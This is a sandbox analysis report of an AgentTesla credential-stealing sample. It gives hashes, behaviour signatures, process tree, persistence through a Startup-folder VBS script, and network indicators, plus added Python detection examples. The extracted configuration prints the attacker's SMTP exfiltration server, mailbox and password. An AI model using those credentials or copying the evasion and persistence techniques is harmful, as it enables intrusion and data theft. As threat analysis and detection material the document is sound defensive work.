Analysis Report DOC04121993.exe

Overview

General Information

Sample Name: DOC04121993.exe
Analysis ID: 321396
MD5: 710843b45a8e65c939d3ab4fb96d73e4
SHA1: 909799ac70c5a8a472b40579ff0c5bc982979676
SHA256: d0ea8610ecee6c92c50af51c37a0a49f8550768609a08a5a2dcaf98bb06dcff3
Tags: AgentTesla

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (creates a PE file in dynamic memory)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Yara detected AgentTesla
.NET source code contains potential unpacker
Allocates memory in foreign processes
Contains functionality to detect sleep reduction / modifications
Delayed program exit found
Drops VBS files to the startup folder
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queues an APC in another process (thread injection)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains strange resources
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara detected Credential Stealer

Startup

  • System is w10x64
  • DOC04121993.exe (PID: 2576 cmdline: 'C:\Users\user\Desktop\DOC04121993.exe' MD5: 710843B45A8E65C939D3AB4FB96D73E4)
    • notepad.exe (PID: 4472 cmdline: C:\Windows\system32\notepad.exe MD5: D693F13FE3AA2010B854C4C60671B8E2)
    • DOC04121993.exe (PID: 1000 cmdline: 'C:\Users\user\Desktop\DOC04121993.exe' MD5: 710843B45A8E65C939D3AB4FB96D73E4)
    • DOC04121993.exe (PID: 1832 cmdline: 'C:\Users\user\Desktop\DOC04121993.exe' 2 1000 3714343 MD5: 710843B45A8E65C939D3AB4FB96D73E4)
  • wscript.exe (PID: 2168 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\STARTUP.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • DOC04121993.exe (PID: 5080 cmdline: 'C:\Users\user\Desktop\DOC04121993.exe' MD5: 710843B45A8E65C939D3AB4FB96D73E4)
      • notepad.exe (PID: 780 cmdline: C:\Windows\system32\notepad.exe MD5: D693F13FE3AA2010B854C4C60671B8E2)
      • DOC04121993.exe (PID: 1956 cmdline: 'C:\Users\user\Desktop\DOC04121993.exe' MD5: 710843B45A8E65C939D3AB4FB96D73E4)
      • DOC04121993.exe (PID: 5320 cmdline: 'C:\Users\user\Desktop\DOC04121993.exe' 2 1956 3726421 MD5: 710843B45A8E65C939D3AB4FB96D73E4)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Username: ": "bq6qu", "URL: ": "http://vd2JBRKVM6n.net", "To: ": "info@hybridgroupco.com", "ByHost: ": "mail.hybridgroupco.com:587", "Password: ": "IhNKJa9", "From: ": "info@hybridgroupco.com"}
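The extracted configuration gives the exfiltration channel outright: SMTP to mail.hybridgroupco.com on port 587, with info@hybridgroupco.com as both sender and recipient, which is the same host behind the TCP connection to 66.70.204.222:587 recorded further down in the signature section. As an added example, not code from the report or from Joe Security, the Python below normalises the extractor's keys (they carry a trailing ": "), derives network IOCs from the config, and checks constructed flow records against them. It also applies a generic egress rule, outbound SMTP to any server not on an allow-list, because AgentTesla's channel is the protocol rather than this one host. Everything except the first flow record and the config itself is an assumption of this example: the other flows, the allow-list, and the `Iocs` / `flag_flows` names.

```python
import json
import re
from dataclasses import dataclass

# Configuration exactly as the report's extractor printed it (keys carry a trailing ": ").
RAW_CONFIG = ('{"Username: ": "bq6qu", "URL: ": "http://vd2JBRKVM6n.net", '
              '"To: ": "info@hybridgroupco.com", "ByHost: ": "mail.hybridgroupco.com:587", '
              '"Password: ": "IhNKJa9", "From: ": "info@hybridgroupco.com"}')


def normalise_config(raw: str) -> dict:
    """Parse the extractor JSON and turn 'ByHost: '-style keys into plain 'byhost'."""
    return {k.strip().rstrip(":").lower(): v for k, v in json.loads(raw).items()}


@dataclass(frozen=True)
class Iocs:
    smtp_host: str
    smtp_port: int
    mailboxes: frozenset
    url_host: str


def iocs_from_config(cfg: dict) -> Iocs:
    """Derive network indicators from the normalised AgentTesla config."""
    host, sep, port = cfg["byhost"].rpartition(":")
    if not sep:
        # Assumption for this example: treat a port-less ByHost as submission port 587.
        host, port = cfg["byhost"], "587"
    url_host = re.sub(r"^[a-z]+://", "", cfg["url"], flags=re.I).split("/")[0].lower()
    mailboxes = frozenset(cfg[k].lower() for k in ("to", "from") if k in cfg)
    return Iocs(host.lower(), int(port), mailboxes, url_host)


SMTP_PORTS = {25, 465, 587}
# Assumption: the organisation's only sanctioned outbound mail server(s).
SANCTIONED_SMTP = {"outlook.office365.com"}

# Constructed flow records: (src, sport, dst, dport, proto, resolved name or None).
# The first is the connection the report recorded; the rest are invented controls
# using TEST-NET addresses.
SAMPLE_FLOWS = [
    ("192.168.2.3", 49731, "66.70.204.222", 587, "tcp", "mail.hybridgroupco.com"),
    ("192.168.2.3", 49812, "198.51.100.25", 587, "tcp", "outlook.office365.com"),
    ("192.168.2.3", 49900, "66.70.204.222", 443, "tcp", "mail.hybridgroupco.com"),
    ("192.168.2.3", 50011, "203.0.113.7", 25, "tcp", None),
]


def flag_flows(flows, iocs: Iocs) -> dict:
    """Map each suspicious flow ("src:sport->dst:dport") to the reasons it matched."""
    findings = {}
    for src, sport, dst, dport, proto, name in flows:
        name = (name or "").lower()
        reasons = []
        if name and name == iocs.smtp_host:
            reasons.append("destination is the SMTP host from the extracted config")
        if proto == "tcp" and dport in SMTP_PORTS and name not in SANCTIONED_SMTP:
            reasons.append(f"outbound SMTP on {dport} to a non-sanctioned server")
        if reasons:
            findings[f"{src}:{sport}->{dst}:{dport}"] = reasons
    return findings


if __name__ == "__main__":
    ioc = iocs_from_config(normalise_config(RAW_CONFIG))
    print(ioc)
    for flow, why in flag_flows(SAMPLE_FLOWS, ioc).items():
        print(flow, "->", "; ".join(why))
```

The credentials in the config are indicators for blocking and for notifying the mailbox owner, not something to authenticate with; the example never uses them. The third flow shows why the host match matters on its own: port 443 to the same server would pass the SMTP rule but still reach attacker infrastructure.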

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000005.00000002.229601884.00000000027C5000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000002.00000002.462629290.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000002.00000002.464088936.00000000009E2000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000000.00000002.199767698.0000000002705000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000002.00000002.464255746.0000000002242000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
(5 of 16 entries shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
7.2.DOC04121993.exe.2290000.3.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
2.2.DOC04121993.exe.2240000.3.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
7.2.DOC04121993.exe.2150000.1.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
2.2.DOC04121993.exe.980000.1.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
7.2.DOC04121993.exe.21b0000.2.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
(5 of 8 entries shown)

Sigma Overview

System Summary:

Sigma detected: Drops script at startup location
Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Windows\SysWOW64\notepad.exe, ProcessId: 4472, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\STARTUP.vbs
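The Startup process tree and this Sigma event describe one persistence chain: notepad.exe (spawned by the sample and, per the injection signatures, hollowed) writes STARTUP.vbs into the user's Startup folder; the Startup folder runs that script through wscript.exe at logon, and the script relaunches DOC04121993.exe from the Desktop, which spawns notepad.exe again. As an added example that is not part of the Joe Sandbox report, the Python below encodes those three observations as rules over Sysmon-style events (EventID 1 process creation, EventID 11 file creation). The `Event` class, the rule names, the helper functions and the benign notepad.exe control event are this example's own; the other event records are constructed from the PIDs, paths and command lines the report shows.

```python
import ntpath
from dataclasses import dataclass


@dataclass
class Event:
    """Sysmon-style record; only the fields the rules need are modelled."""
    event_id: int              # 1 = process creation, 11 = file creation
    image: str                 # full path of the acting process
    process_id: int
    parent_image: str = ""     # EventID 1 only
    command_line: str = ""     # EventID 1 only
    target_filename: str = ""  # EventID 11 only


# Lower-cased suffix shared by the per-user and all-users Startup folders.
STARTUP_SUFFIX = "\\microsoft\\windows\\start menu\\programs\\startup\\"
SCRIPT_EXTS = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh", ".hta", ".bat", ".cmd", ".ps1"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}


def _base(path: str) -> str:
    return ntpath.basename(path).lower()


def _under_user_profile(path: str) -> bool:
    return "\\users\\" in path.lower()


def _has_arguments(command_line: str) -> bool:
    """True if anything follows the executable token of a Windows command line.
    An unquoted executable path containing spaces is ambiguous and is treated
    as having arguments; Sysmon quotes such paths, so this is rare in practice."""
    cmd = command_line.strip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        rest = cmd[end + 1:] if end != -1 else ""
    else:
        rest = cmd.partition(" ")[2]
    return rest.strip() != ""


def script_dropped_in_startup(ev: Event) -> bool:
    """The logic behind the Sigma hit: a script file created in a Startup folder."""
    target = ev.target_filename.lower()
    return (ev.event_id == 11 and STARTUP_SUFFIX in target
            and ntpath.splitext(target)[1] in SCRIPT_EXTS)


def script_host_launches_user_path_binary(ev: Event) -> bool:
    """wscript/cscript starting an executable that lives under C:\\Users."""
    return (ev.event_id == 1 and _base(ev.parent_image) in SCRIPT_HOSTS
            and _under_user_profile(ev.image))


def user_path_parent_spawns_notepad(ev: Event) -> bool:
    """A user-profile binary starting notepad.exe with no document to open,
    the shape of the suspended-process injection seen in this report."""
    return (ev.event_id == 1 and _base(ev.image) == "notepad.exe"
            and _under_user_profile(ev.parent_image)
            and not _has_arguments(ev.command_line))


RULES = {
    "script_dropped_in_startup": script_dropped_in_startup,
    "script_host_launches_user_path_binary": script_host_launches_user_path_binary,
    "user_path_parent_spawns_notepad": user_path_parent_spawns_notepad,
}


def evaluate(events) -> list:
    """Return (process_id, rule_name) for every event that matches a rule."""
    return [(ev.process_id, name) for ev in events
            for name, rule in RULES.items() if rule(ev)]


DESKTOP_EXE = r"C:\Users\user\Desktop\DOC04121993.exe"
STARTUP_VBS = r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\STARTUP.vbs"

# Constructed events mirroring the report's process tree and Sigma hit, plus one benign control.
SAMPLE_EVENTS = [
    Event(1, DESKTOP_EXE, 2576, parent_image=r"C:\Windows\explorer.exe",
          command_line=f'"{DESKTOP_EXE}"'),
    Event(1, r"C:\Windows\SysWOW64\notepad.exe", 4472, parent_image=DESKTOP_EXE,
          command_line=r"C:\Windows\system32\notepad.exe"),
    Event(11, r"C:\Windows\SysWOW64\notepad.exe", 4472, target_filename=STARTUP_VBS),
    Event(1, r"C:\Windows\System32\wscript.exe", 2168, parent_image=r"C:\Windows\explorer.exe",
          command_line=f'"C:\\Windows\\System32\\WScript.exe" "{STARTUP_VBS}"'),
    Event(1, DESKTOP_EXE, 5080, parent_image=r"C:\Windows\System32\wscript.exe",
          command_line=f'"{DESKTOP_EXE}"'),
    # Benign control (invented): a user opening a text file in notepad from Explorer.
    Event(1, r"C:\Windows\System32\notepad.exe", 7001, parent_image=r"C:\Windows\explorer.exe",
          command_line=r'"C:\Windows\System32\notepad.exe" C:\Users\user\Desktop\notes.txt'),
]

if __name__ == "__main__":
    for pid, rule in evaluate(SAMPLE_EVENTS):
        print(pid, rule)
```

The first rule alone reproduces the Sigma hit; the other two catch the chain even if the dropped script used a name or extension the first rule does not list, because they key on process lineage rather than on the file. Note that the Sysmon image is the SysWOW64 copy of notepad.exe while the command line says system32: the 32-bit sample is subject to file system redirection, so rules that compare image and command line paths literally will miss it.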

                      Signature Overview

                      AV Detection:

Found malware configuration
Source: DOC04121993.exe.1000.2.memstr | Malware Configuration Extractor: Agenttesla {"Username: ": "bq6qu", "URL: ": "http://vd2JBRKVM6n.net", "To: ": "info@hybridgroupco.com", "ByHost: ": "mail.hybridgroupco.com:587", "Password: ": "IhNKJa9", "From: ": "info@hybridgroupco.com"}
Multi AV Scanner detection for domain / URL
Source: mail.hybridgroupco.com | Virustotal: Detection: 9%
Multi AV Scanner detection for submitted file
Source: DOC04121993.exe | Virustotal: Detection: 69%
Source: DOC04121993.exe | ReversingLabs: Detection: 81%
Machine Learning detection for sample
Source: DOC04121993.exe | Joe Sandbox ML: detected
Source: 2.2.DOC04121993.exe.2240000.3.unpack | Avira: Label: TR/Spy.Gen8
Source: 7.2.DOC04121993.exe.2290000.3.unpack | Avira: Label: TR/Spy.Gen8
Source: 5.2.DOC04121993.exe.2750000.3.unpack | Avira: Label: TR/Spy.Gen8
Source: 0.2.DOC04121993.exe.22e0000.2.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 7.2.DOC04121993.exe.400000.0.unpack | Avira: Label: TR/Spy.Gen8
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 0_2_00408978 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 0_2_00408A78 FindFirstFileA,GetLastError,
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 0_2_00405B54 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 3_2_00408978 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 3_2_00408A78 FindFirstFileA,GetLastError,
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 3_2_00405B54 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 5_2_00408978 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 5_2_00408A78 FindFirstFileA,GetLastError,
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 5_2_00405B54 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 8_2_00408978 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 8_2_00408A78 FindFirstFileA,GetLastError,
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 8_2_00405B54 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: global traffic | TCP traffic: 192.168.2.3:49731 -> 66.70.204.222:587
Source: Joe Sandbox View | IP Address: 66.70.204.222
Source: Joe Sandbox View | ASN Name: OVHFR
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 2_2_0233A186 recv,
Source: unknown | DNS traffic detected: queries for: mail.hybridgroupco.com
Source: DOC04121993.exe, DOC04121993.exe, 00000007.00000002.223712280.0000000000475000.00000040.00000001.sdmp | String found in binary or memory: http://127.0.0.1:
Source: DOC04121993.exe, 00000002.00000002.468167788.0000000002C9E000.00000004.00000001.sdmp | String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
Source: DOC04121993.exe, 00000002.00000002.468167788.0000000002C9E000.00000004.00000001.sdmp | String found in binary or memory: http://cert.int-x3.letsencrypt.org/0
Source: DOC04121993.exe, 00000002.00000002.468167788.0000000002C9E000.00000004.00000001.sdmp | String found in binary or memory: http://cps.letsencrypt.org0
Source: DOC04121993.exe, 00000002.00000002.468167788.0000000002C9E000.00000004.00000001.sdmp | String found in binary or memory: http://cps.root-x1.letsencrypt.org0
Source: DOC04121993.exe, 00000002.00000002.468167788.0000000002C9E000.00000004.00000001.sdmp | String found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
Source: DOC04121993.exe, 00000002.00000002.468167788.0000000002C9E000.00000004.00000001.sdmp | String found in binary or memory: http://isrg.trustid.ocsp.identrust.com0;
Source: DOC04121993.exe, 00000002.00000002.468167788.0000000002C9E000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.int-x3.letsencrypt.org0/
Source: DOC04121993.exe, 00000002.00000002.467888799.0000000002B70000.00000004.00000001.sdmp | String found in binary or memory: http://vd2JBRKVM6n.net
Source: DOC04121993.exe, 00000002.00000002.467655668.0000000002A92000.00000004.00000001.sdmp | String found in binary or memory: http://vd2JBRKVM6n.net$
Source: DOC04121993.exe, DOC04121993.exe, 00000007.00000002.223712280.0000000000475000.00000040.00000001.sdmp | String found in binary or memory: https://api.telegram.org/bot%telegramapi%/
Source: DOC04121993.exe | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/
Source: DOC04121993.exe | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: DOC04121993.exe, 00000000.00000002.199767698.0000000002705000.00000040.00000001.sdmp, DOC04121993.exe, 00000002.00000002.462629290.0000000000402000.00000040.00000001.sdmp, DOC04121993.exe, 00000005.00000002.229601884.00000000027C5000.00000040.00000001.sdmp, DOC04121993.exe, 00000007.00000002.223712280.0000000000475000.00000040.00000001.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/U
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 0_2_004070F2 OpenClipboard,
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 0_2_00422CC4 GetClipboardData,CopyEnhMetaFileA,GetEnhMetaFileHeader,
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 3_2_00423308 GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette,
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 0_2_0045E108 GetKeyboardState,SetKeyboardState,SendMessageA,SendMessageA,
Source: DOC04121993.exe, 00000000.00000002.198945887.000000000084A000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                      System Summary:

Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 0_2_0045AACC NtdllDefWindowProc_A,
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 0_2_0045B248 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 0_2_0045B2F8 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 0_2_0044F67C GetSubMenu,SaveDC,RestoreDC,73BBB080,SaveDC,RestoreDC,NtdllDefWindowProc_A,
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 0_2_00433DC8 NtdllDefWindowProc_A,
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 0_2_0043FF18 NtdllDefWindowProc_A,GetCapture,
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 2_2_0046E159 NtCreateSection,
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 2_2_0233B362 NtQuerySystemInformation,
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 2_2_0233B331 NtQuerySystemInformation,
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 3_2_0045AACC NtdllDefWindowProc_A,
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 3_2_0045B248 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 3_2_0045B2F8 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 3_2_0044F67C GetSubMenu,SaveDC,RestoreDC,GetWindowDC,SaveDC,RestoreDC,NtdllDefWindowProc_A,
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 3_2_00433DC8 NtdllDefWindowProc_A,
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 3_2_0043FF18 NtdllDefWindowProc_A,GetCapture,
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 5_2_0045AACC NtdllDefWindowProc_A,
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 5_2_0045B248 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 5_2_0045B2F8 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 5_2_0044F67C GetSubMenu,SaveDC,RestoreDC,GetWindowDC,SaveDC,RestoreDC,NtdllDefWindowProc_A,
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 5_2_00433DC8 NtdllDefWindowProc_A,
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 5_2_0043FF18 NtdllDefWindowProc_A,GetCapture,
Source: C:\Users\user\Desktop\DOC04121993.exe | Code functions, process 0: 0_2_004551A0, 0_2_0044F67C
Source: C:\Users\user\Desktop\DOC04121993.exe | Code functions, process 2: 2_2_00467976, 2_2_0046D13D, 2_2_04E3B6E8, 2_2_04E33468, 2_2_04E3702E, 2_2_04E20007, 2_2_04E39010, 2_2_04E331F8, 2_2_04E3DBB8, 2_2_04E39388, 2_2_04E37990, 2_2_04E31568, 2_2_04E31D20, 2_2_04E3CB3F, 2_2_04E3810F, 2_2_04E3C8EB, 2_2_04E39CFE, 2_2_04E3C8AF, 2_2_04E384B1, 2_2_04E328B8, 2_2_04E348BE, 2_2_04E3C889, 2_2_04E32099, 2_2_04E37A98, 2_2_04E3566C, 2_2_04E36A72, 2_2_04E3C877, 2_2_04E37E78, 2_2_04E36C35, 2_2_04E39000, 2_2_04E355D3, 2_2_04E3A3A2, 2_2_04E3DBA9, 2_2_04E357AD, 2_2_04E38998, 2_2_04E39378, 2_2_04E3155A, 2_2_04E32136, 2_2_04E3553A, 2_2_04E39D03, 2_2_04E39D08, 2_2_04E31D10, 2_2_05AE07F0, 2_2_05AE59C8, 2_2_05AE0D10, 2_2_05AE7710, 2_2_05AE5370, 2_2_05AE3740, 2_2_05AE1CC0, 2_2_05AE7E08, 2_2_05AE8648, 2_2_05AE0DBB, 2_2_05AE7DF8, 2_2_05AE63CC, 2_2_05AE0DCD, 2_2_05AE07D3, 2_2_05AE3731, 2_2_05AE7703, 2_2_05AE1115, 2_2_05AE1EA3, 2_2_05AE72BC, 2_2_05AE1CB0, 2_2_05AE7E87, 2_2_05AE0E93, 2_2_05AE0CF9, 2_2_05AE08D6, 2_2_05AE0A2A, 2_2_05AE2414, 2_2_05AE0E6A, 2_2_05B5A148, 2_2_05B5AED0, 2_2_05B5EAD0, 2_2_05B5BE50, 2_2_05B5B250
Source: C:\Users\user\Desktop\DOC04121993.exe | Code functions, process 3: 3_2_004551A0, 3_2_0044F67C
Source: C:\Users\user\Desktop\DOC04121993.exe | Code functions, process 5: 5_2_004551A0, 5_2_0044F67C
Source: C:\Users\user\Desktop\DOC04121993.exe | Code functions, process 7: 7_2_00467976, 7_2_0046D13D
Source: C:\Users\user\Desktop\DOC04121993.exe | Code functions, process 8: 8_2_004551A0, 8_2_0044F67C
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: String function: 00467F3C appears 33 times
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: String function: 004264A4 appears 36 times
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: String function: 00413454 appears 32 times
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: String function: 004145C0 appears 40 times
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: String function: 00403648 appears 113 times
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: String function: 0040274C appears 38 times
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: String function: 00404AA4 appears 40 times
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: String function: 0041E128 appears 32 times
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: String function: 0041E918 appears 36 times
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: String function: 00403A14 appears 131 times
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: String function: 0040674C appears 64 times
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: String function: 00403E90 appears 53 times
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: String function: 004043D8 appears 69 times
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: String function: 0040699C appears 52 times
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: String function: 004060E8 appears 40 times
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: String function: 0040C464 appears 72 times
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: String function: 004043B4 appears 309 times
Source: DOC04121993.exe | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST (12 such resources)
                      Source: DOC04121993.exe, 00000000.00000002.199905445.0000000002766000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenameyZFlSsyWYLpOIrYUuUqNGPSmFjhfv.exe4 vs DOC04121993.exe
                      Source: DOC04121993.exe, 00000000.00000002.198869393.00000000006B0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameuser32j% vs DOC04121993.exe
                      Source: DOC04121993.exe | Binary or memory string: OriginalFilename vs DOC04121993.exe
                      Source: DOC04121993.exe, 00000002.00000002.462629290.0000000000402000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenameyZFlSsyWYLpOIrYUuUqNGPSmFjhfv.exe4 vs DOC04121993.exe
                      Source: DOC04121993.exe, 00000002.00000002.468977606.00000000059E0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamewshom.ocx.mui vs DOC04121993.exe
